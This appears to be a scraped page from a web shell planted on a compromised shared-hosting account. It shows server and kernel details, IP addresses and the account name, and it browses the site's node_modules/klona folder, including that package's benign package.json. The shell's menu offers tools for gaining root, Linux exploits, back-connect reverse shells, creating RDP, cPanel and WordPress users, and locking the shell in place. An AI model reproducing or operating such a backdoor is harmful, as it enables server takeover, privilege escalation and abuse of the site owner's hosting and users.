Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
klona /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
dr-xr-xr-x
full
[ DIR ]
dr-xr-xr-x
json
[ DIR ]
dr-xr-xr-x
lite
[ DIR ]
dr-xr-xr-x
index.d.ts
38
B
-rw-r--r--
license
1.08
KB
-rw-r--r--
package.json
1.47
KB
-rw-r--r--
readme.md
6.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "klona", "version": "2.0.5", "repository": "lukeed/klona", "description": "A tiny (240B to 501B) and fast utility to \"deep clone\" Objects, Arrays, Dates, RegExps, and more!", "module": "dist/index.mjs", "unpkg": "dist/index.min.js", "main": "dist/index.js", "types": "index.d.ts", "license": "MIT", "author": { "name": "Luke Edwards", "email": "luke.edwards05@gmail.com", "url": "https://lukeed.com" }, "files": [ "*.d.ts", "dist", "full", "json", "lite" ], "exports": { ".": { "import": "./dist/index.mjs", "require": "./dist/index.js" }, "./json": { "import": "./json/index.mjs", "require": "./json/index.js" }, "./lite": { "import": "./lite/index.mjs", "require": "./lite/index.js" }, "./full": { "import": "./full/index.mjs", "require": "./full/index.js" }, "./package.json": "./package.json" }, "modes": { "json": "src/json.js", "lite": "src/lite.js", "default": "src/index.js", "full": "src/full.js" }, "engines": { "node": ">= 8" }, "scripts": { "build": "bundt", "pretest": "npm run build", "postbuild": "echo \"lite full json\" | xargs -n1 cp -v index.d.ts", "test": "uvu -r esm test -i suites" }, "keywords": [ "clone", "copy", "deep", "extend", "recursive", "object" ], "devDependencies": { "bundt": "1.0.2", "esm": "3.2.25", "uvu": "0.5.2" } }
Close